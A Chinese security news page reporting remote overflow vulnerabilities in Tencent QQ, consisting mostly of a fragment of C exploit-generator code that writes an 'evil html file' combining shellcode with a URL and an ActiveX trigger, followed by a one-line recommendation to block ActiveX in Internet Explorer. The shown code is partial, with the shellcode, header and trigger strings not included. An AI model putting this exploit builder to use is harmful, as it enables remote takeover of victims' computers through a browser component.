| 〓 站 内 公 告 〓 |
|
| 〓 专 题 栏 目 〓 |
|
| 〓最近更新〓 |
|
|
|
|
|
你的位置:首页>QQ安全>正文 |
|
腾讯QQ发现多个远程溢出漏洞,可完全控制对方计算机
|
|
printf("[+] exploit file:%s ", file);
fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error! "); return; }
//build evil html file fprintf(fp, "%s", header); fflush(fp);
memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1; PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer); fflush(fp);
fprintf(fp, "%s", trigger); fflush(fp);
printf("[+] exploit write to %s success! ", file); }
----------------------------------------------------------------------------------------
建议: 禁止ie执行activex
|
|
|
|
上一篇:腾讯发布反盗号软件QQ医生 无意涉足安全市场 下一篇:妙除QQ病毒,让隐藏文件现身 | |
 |
|
|